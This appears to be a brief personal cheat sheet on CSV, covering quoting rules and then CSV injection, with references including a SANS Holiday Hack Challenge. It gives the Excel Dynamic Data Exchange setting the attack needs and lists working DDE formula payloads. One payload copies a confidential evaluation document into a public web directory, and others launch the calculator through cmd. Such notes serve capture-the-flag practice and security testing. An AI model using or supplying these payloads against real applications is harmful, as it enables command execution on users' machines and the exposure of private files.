Comma-separated values (CSV)

• Comma-separated values (Wikipedia)

CSV Format

1997,Ford,E350

"1997","Ford","E350"

1997,Ford,E350,"Super, luxurious truck"

1997,Ford,E350,"Super, ""luxurious"" truck"

CSV Injection

• CSV Injection Payload List
• SANS Holiday Hack Challenge 2018
• Data Extraction to Command Execution CSV Injection (Veracode)

Prerequisite

Excel configuration must allow Dynamic Data Exchange:

• Open Excel and go to Trust Center Settings
• Under Security settings for Dynamic Data Exchange, check Enable Dynamic Data Exchange Server Launch (not recommended)

Examples

Create a CSV file with the following content and upload the file in the application. This is interpreted as a formula and will copy the file to a public directory on the web server.

=cmd|'/C copy C:\\candidate_evaluation.docx C:\\careerportal\\resources\\public\\lisandre.docx'!A0
Line2
Line3

Open the calculator application

=cmd|' /C calc'!A0
=cmd|' /C calc'!'A1'